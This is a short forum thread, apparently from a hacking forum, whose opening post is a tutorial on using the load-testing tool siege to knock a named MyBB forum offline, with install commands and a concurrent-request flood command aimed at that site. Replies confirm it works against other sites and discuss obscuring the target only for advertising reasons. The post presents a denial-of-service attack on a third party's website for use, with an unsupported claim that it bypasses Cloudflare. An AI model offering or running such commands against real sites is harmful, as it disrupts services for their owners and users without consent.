Using siege to take down websites with cloudflare + mybb

Things you will need

Linux Box
Siege

Installing siege

First, run these commands to update your machine

Code 
sudo apt-get update && sudo apt-get upgrade

Then we are going to install siege with

Code 
sudo apt-get install siege

Now that we have siege installed we can issue our denial of service exploit

Using siege

To use siege we will run the command

Code 
siege -c 200 sithere.net

This tells siege to use a concurrent attack method of 200 users. This bypasses cloudflare and really hurts mybb

Results

You don't need a big machine at all to do this, i did this from my home computer. if successful you should knock sithere.net and it will show this page

I've cached this tutorial for personal use but I have a feeling it will be taken down quickly as Omni doesn't like people posting exploits against MyBB for obvious reasons.

Already talked to omni, his firewall has protection against this one. I wouldn't post something potentially dangerous to hf without consulting him first.

Siege is already installed in Kali Linux under Stress Testing>Network Stress Testing. It works on other sites too, don't have to be MyBB or CloudFail. I used it a while back.

if you delete the name then sure, black it out on the image too but you cannot advertise that forum here at all.. even in a tutorial.

Alright, i thought it would be ok, because it's not advertising. In fact it's showing how to take it down. Will edit it when i get home.
